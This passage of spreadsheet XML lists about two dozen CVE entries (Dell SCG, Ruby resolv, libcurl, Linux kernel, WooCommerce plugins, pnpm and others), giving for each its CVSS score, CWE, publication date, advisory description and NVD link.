        </is>
      </c>
    </row>
    <row r="2839">
      <c r="A2839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79950</t>
        </is>
      </c>
      <c r="C2839" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2839" s="5" t="inlineStr"/>
      <c r="F2839" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2839" s="5" t="inlineStr"/>
      <c r="H2839" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2839" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2839" s="5" t="inlineStr"/>
      <c r="K2839" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L283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M2839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79950</t>
        </is>
      </c>
    </row>
    <row r="2840">
      <c r="A2840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80123</t>
        </is>
      </c>
      <c r="C2840" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2840" s="5" t="inlineStr"/>
      <c r="F2840" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2840" s="5" t="inlineStr"/>
      <c r="H2840" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2840" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2840" s="5" t="inlineStr"/>
      <c r="K2840" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2840"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denial of service.</t>
        </is>
      </c>
      <c r="M2840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80123</t>
        </is>
      </c>
    </row>
    <row r="2841">
      <c r="A2841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80135</t>
        </is>
      </c>
      <c r="C2841" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2841" s="5" t="inlineStr"/>
      <c r="F2841" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2841" s="5" t="inlineStr"/>
      <c r="H2841" s="5" t="inlineStr"/>
      <c r="I2841" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2841" s="5" t="inlineStr"/>
      <c r="K2841" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="L2841" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Check or Handling of Exceptional Conditions vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="M2841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80135</t>
        </is>
      </c>
    </row>
    <row r="2842">
      <c r="A2842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80212</t>
        </is>
      </c>
      <c r="C2842" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2842" s="5" t="inlineStr"/>
      <c r="F2842" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2842" s="5" t="inlineStr"/>
      <c r="H2842" s="5" t="inlineStr"/>
      <c r="I2842" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2842" s="5" t="inlineStr"/>
      <c r="K2842" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2842" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the resolv gem before 0.7.2 for Ruby. Resolv::DNS::Resource.get_class, Resolv::DNS::Resource::Generic.create, and Resolv::DNS::SvcParam::Generic.create generate a new class for each unknown DNS resource record (type, class) pair, or each unknown SvcParamKey, encountered while decoding a response. Each generated class was permanently registered both as a constant on Resource (or SvcParam::Generic) and as an entry in a class-lookup hash (ClassHash), and thus the class remained reachable through that constant after the response was discarded. Type and class are each 16-bit values, and thus an attacker controlling DNS responses (a spoofed response, or a malicious or hijacked upstream DNS server) has roughly 2^32 distinct (type, class) pairs to choose from. A single response of a few hundred kilobytes carrying tens of thousands of distinct unknown types permanently grows process memory by tens of megabytes; repeated responses accumulate without bound and are never reclaimed by garbage collection, because the constant keeps each class alive. Any code path that calls Resolv::DNS::Message.decode on attacker-influenced DNS responses is affected. resolv is a default gem, and thus this is reachable from a plain Ruby installation without any additional dependency.</t>
        </is>
      </c>
      <c r="M2842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80212</t>
        </is>
      </c>
    </row>
    <row r="2843">
      <c r="A2843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80229</t>
        </is>
      </c>
      <c r="C2843" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2843" s="5" t="inlineStr"/>
      <c r="F2843" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2843" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H2843" s="5" t="inlineStr"/>
      <c r="I2843" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2843" s="5" t="inlineStr"/>
      <c r="K2843" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2843" s="5" t="inlineStr">
        <is>
          <t>When performing transfers via libcurl’s multi interface, pooled TLS
connections can outlive their originating easy handles. In OpenSSL 3 provider
configurations, libcurl attaches an allocated library context to the easy
handle's state and passes it to OpenSSL without acquiring an ownership
reference; destroying the easy handle prematurely frees this context while the
active connection retains a dangling pointer, leading to a heap-use-after-free
upon subsequent I/O or post-handshake operations.</t>
        </is>
      </c>
      <c r="M2843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80229</t>
        </is>
      </c>
    </row>
    <row r="2844">
      <c r="A2844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80230</t>
        </is>
      </c>
      <c r="C2844" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2844" s="5" t="inlineStr"/>
      <c r="F2844" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2844" s="5" t="inlineStr"/>
      <c r="H2844" s="5" t="inlineStr"/>
      <c r="I2844" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2844" s="5" t="inlineStr"/>
      <c r="K2844" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2844" s="5" t="inlineStr">
        <is>
          <t>When `CURLOPT_PINNEDPUBLICKEY` is configured alongside options that disable
standard peer verification (`CURLOPT_SSL_VERIFYPEER = 0` and
`CURLOPT_SSL_VERIFYHOST = 0`), libcurl fails to enforce public key pinning on
connections established without a presented server certificate. Bypassing the
pinning check under these disabled-verification conditions allows
unauthenticated connections to succeed when they should be rejected.</t>
        </is>
      </c>
      <c r="M2844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80230</t>
        </is>
      </c>
    </row>
    <row r="2845">
      <c r="A2845" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80231</t>
        </is>
      </c>
      <c r="C2845" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2845" s="5" t="inlineStr"/>
      <c r="F2845" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2845" s="5" t="inlineStr"/>
      <c r="H2845" s="5" t="inlineStr"/>
      <c r="I2845" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2845" s="5" t="inlineStr"/>
      <c r="K2845" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L2845" s="5" t="inlineStr">
        <is>
          <t>A flaw in libcurl makes it wrongly reuse an existing HTTPS connection setup
for a given hostname even when using a different Native CA Store setting
(`CURLSSLOPT_NATIVE_CA`) than when the connection was created.</t>
        </is>
      </c>
      <c r="M2845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80231</t>
        </is>
      </c>
    </row>
    <row r="2846">
      <c r="A2846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80255</t>
        </is>
      </c>
      <c r="C2846" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2846" s="5" t="inlineStr"/>
      <c r="F2846" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2846" s="5" t="inlineStr"/>
      <c r="H2846" s="5" t="inlineStr"/>
      <c r="I2846" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2846" s="5" t="inlineStr"/>
      <c r="K2846" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L2846" s="5" t="inlineStr">
        <is>
          <t>A `Set-Cookie:` header using tab (horizontal tab, ASCII code 9) instead of
space (ascii code 32) immediately before the `Secure` attribute causes curl to
store the cookie without its Secure flag. The cookie might then wrongfully be
sent over plaintext HTTP on subsequent requests to the same host.</t>
        </is>
      </c>
      <c r="M2846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80255</t>
        </is>
      </c>
    </row>
    <row r="2847">
      <c r="A2847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80924</t>
        </is>
      </c>
      <c r="C2847" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2847" s="5" t="inlineStr"/>
      <c r="F2847" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2847" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2847" s="5" t="inlineStr"/>
      <c r="I2847" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2847" s="5" t="inlineStr"/>
      <c r="K2847" s="5" t="inlineStr"/>
      <c r="L2847" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: krb5 - use kfree_sensitive() for derived key buffers
crypto_krb5_prepare_encryption() and crypto_krb5_prepare_checksum()
free the buffer holding the freshly derived keys with plain kfree(),
leaving the key material behind in the freed slab object.</t>
        </is>
      </c>
      <c r="M2847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80924</t>
        </is>
      </c>
    </row>
    <row r="2848">
      <c r="A2848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81265</t>
        </is>
      </c>
      <c r="C2848" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2848" s="5" t="inlineStr"/>
      <c r="F2848" s="5" t="inlineStr"/>
      <c r="G2848" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2848" s="5" t="inlineStr"/>
      <c r="I2848" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2848" s="5" t="inlineStr"/>
      <c r="K2848" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2848" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5.</t>
        </is>
      </c>
      <c r="M2848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81265</t>
        </is>
      </c>
    </row>
    <row r="2849">
      <c r="A2849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81270</t>
        </is>
      </c>
      <c r="C2849" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2849" s="5" t="inlineStr"/>
      <c r="F2849" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2849" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2849" s="5" t="inlineStr"/>
      <c r="I2849" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2849" s="5" t="inlineStr"/>
      <c r="K2849" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2849" s="5" t="inlineStr">
        <is>
          <t>Apache Allura: exposure of non-public information via search.
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81270</t>
        </is>
      </c>
    </row>
    <row r="2850">
      <c r="A2850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81355</t>
        </is>
      </c>
      <c r="C2850" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2850" s="5" t="inlineStr"/>
      <c r="F2850" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2850" s="5" t="inlineStr"/>
      <c r="H2850" s="5" t="inlineStr"/>
      <c r="I2850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2850" s="5" t="inlineStr"/>
      <c r="K2850" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2850" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t>
        </is>
      </c>
    </row>
    <row r="2851">
      <c r="A2851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81624</t>
        </is>
      </c>
      <c r="C2851" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2851" s="5" t="inlineStr"/>
      <c r="F2851" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2851" s="5" t="inlineStr"/>
      <c r="H2851" s="5" t="inlineStr"/>
      <c r="I2851" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2851" s="5" t="inlineStr"/>
      <c r="K2851" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2851" s="5" t="inlineStr">
        <is>
          <t>Undertow is a flexible performant web server used in JBoss EAP and WildFly. A flaw was found in how Undertow handles WebSocket connections. Specifically, certain configuration limits like message buffer sizes and session timeouts cannot be adjusted and default to being unlimited. This allows a remote attacker to send large amounts of data or maintain connections indefinitely, potentially crashing the server by exhausting its memory or other resources.</t>
        </is>
      </c>
      <c r="M2851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81624</t>
        </is>
      </c>
    </row>
    <row r="2852">
      <c r="A2852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81665</t>
        </is>
      </c>
      <c r="C2852" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2852" s="5" t="inlineStr"/>
      <c r="F2852" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2852" s="5" t="inlineStr"/>
      <c r="H2852" s="5" t="inlineStr"/>
      <c r="I2852" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2852" s="5" t="inlineStr"/>
      <c r="K2852" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2852" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow was found in Corosync's Totem Process Group (totempg) message reassembly. When processing fragmented multicast messages, the buffer used to reassemble fragments lacks a runtime bounds check in release builds. A network-adjacent attacker able to send crafted multicast protocol messages to the cluster could cause a heap buffer overflow with attacker-controlled data. This can crash the Corosync daemon, causing a denial of service to the entire cluster, and may potentially allow further exploitation given sufficient heap-corruption control.</t>
        </is>
      </c>
      <c r="M2852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81665</t>
        </is>
      </c>
    </row>
    <row r="2853">
      <c r="A2853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81786</t>
        </is>
      </c>
      <c r="C2853" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2853" s="5" t="inlineStr"/>
      <c r="F2853" s="5" t="inlineStr"/>
      <c r="G2853" s="5" t="inlineStr"/>
      <c r="H2853" s="5" t="inlineStr"/>
      <c r="I2853" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2853" s="5" t="inlineStr"/>
      <c r="K2853" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2853" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Thank You Page Customizer for WooCommerce &lt;= 1.2.2 versions.</t>
        </is>
      </c>
      <c r="M2853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81786</t>
        </is>
      </c>
    </row>
    <row r="2854">
      <c r="A2854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81790</t>
        </is>
      </c>
      <c r="C2854" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2854" s="5" t="inlineStr"/>
      <c r="F2854" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2854" s="5" t="inlineStr"/>
      <c r="H2854" s="5" t="inlineStr"/>
      <c r="I2854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2854" s="5" t="inlineStr"/>
      <c r="K2854" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2854" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t>
        </is>
      </c>
      <c r="M2854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t>
        </is>
      </c>
    </row>
    <row r="2855">
      <c r="A2855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81794</t>
        </is>
      </c>
      <c r="C2855" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2855" s="5" t="inlineStr"/>
      <c r="F2855" s="5" t="inlineStr"/>
      <c r="G2855" s="5" t="inlineStr"/>
      <c r="H2855" s="5" t="inlineStr"/>
      <c r="I2855" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2855" s="5" t="inlineStr"/>
      <c r="K2855" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2855" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Shirt Product Designer for WooCommerce 1.0.4 versions.</t>
        </is>
      </c>
      <c r="M2855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81794</t>
        </is>
      </c>
    </row>
    <row r="2856">
      <c r="A2856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81799</t>
        </is>
      </c>
      <c r="C2856" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2856" s="5" t="inlineStr"/>
      <c r="F2856" s="5" t="inlineStr"/>
      <c r="G2856" s="5" t="inlineStr"/>
      <c r="H2856" s="5" t="inlineStr"/>
      <c r="I2856" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2856" s="5" t="inlineStr"/>
      <c r="K2856" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2856" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Return Refund and Exchange For WooCommerce &lt;= 4.6.4 versions.</t>
        </is>
      </c>
      <c r="M2856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81799</t>
        </is>
      </c>
    </row>
    <row r="2857">
      <c r="A2857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81803</t>
        </is>
      </c>
      <c r="C2857" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2857" s="5" t="inlineStr"/>
      <c r="F2857" s="5" t="inlineStr"/>
      <c r="G2857" s="5" t="inlineStr"/>
      <c r="H2857" s="5" t="inlineStr"/>
      <c r="I2857" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2857" s="5" t="inlineStr"/>
      <c r="K2857" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2857" s="5" t="inlineStr">
        <is>
          <t>Subscriber Remote Code Execution (RCE) in RepairBuddy &lt;= 4.1224 versions.</t>
        </is>
      </c>
      <c r="M2857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81803</t>
        </is>
      </c>
    </row>
    <row r="2858">
      <c r="A2858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81804</t>
        </is>
      </c>
      <c r="C2858" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2858" s="5" t="inlineStr"/>
      <c r="F2858" s="5" t="inlineStr"/>
      <c r="G2858" s="5" t="inlineStr"/>
      <c r="H2858" s="5" t="inlineStr"/>
      <c r="I2858" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2858" s="5" t="inlineStr"/>
      <c r="K2858" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L2858" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in ZHBackup – Backup, Restore &amp;amp; Migration &lt;= 2.4.2 versions.</t>
        </is>
      </c>
      <c r="M2858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81804</t>
        </is>
      </c>
    </row>
    <row r="2859">
      <c r="A2859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82208</t>
        </is>
      </c>
      <c r="C2859" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2859" s="5" t="inlineStr"/>
      <c r="F2859" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2859" s="5" t="inlineStr"/>
      <c r="H2859" s="5" t="inlineStr"/>
      <c r="I2859" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2859" s="5" t="inlineStr"/>
      <c r="K2859" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2859" s="5" t="inlineStr">
        <is>
          <t>With the wolfSSL backend, when CA caching is enabled and an
`CURLOPT_SSL_CTX_FUNCTION` callback replaces the trust store, libcurl can
silently reinstall the cached store after the callback returns. A certificate
trusted by the cached store but rejected by the callback-selected store is
then incorrectly accepted.</t>
        </is>
      </c>
      <c r="M2859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82208</t>
        </is>
      </c>
    </row>
    <row r="2860">
      <c r="A2860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82393</t>
        </is>
      </c>
      <c r="C2860" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2860" s="5" t="inlineStr"/>
      <c r="F2860" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2860" s="5" t="inlineStr"/>
      <c r="H2860" s="5" t="inlineStr"/>
      <c r="I2860" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2860" s="5" t="inlineStr"/>
      <c r="K2860" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73, CWE-94</t>
        </is>
      </c>
      <c r="L2860" s="5" t="inlineStr">
        <is>
          <t>pnpm is a package manager. Prior to 10.34.5 and 11.11.0, pnpm accepts a scoped path traversal in a tarball dependency's package.json manifest name because pnpm11/resolving/npm-resolver/src/pickPackage.ts rejects slash characters only for unscoped names. During pnpm install, the unvalidated name reaches raw path joins in pnpm11/installing/deps-resolver/src/resolvePeers.ts, pnpm11/installing/deps-resolver/src/index.ts, and pnpm11/deps/graph-builder/src/lockfileToDepGraph.ts, causing package extraction outside node_modules and allowing attacker-controlled files to overwrite arbitrary filesystem paths even when --ignore-scripts is used. The overwrite can replace shell startup files, Git hooks, or installed package code and lead to code execution. This issue is fixed in versions 10.34.5, and 11.11.0.</t>
        </is>
      </c>
      <c r="M2860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82393</t>
        </is>
      </c>
    </row>
    <row r="2861">
      <c r="A2861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82397</t>
        </is>
      </c>
      <c r="C2861" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2861" s="5" t="inlineStr"/>
      <c r="F2861" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2861" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2861" s="5" t="inlineStr"/>
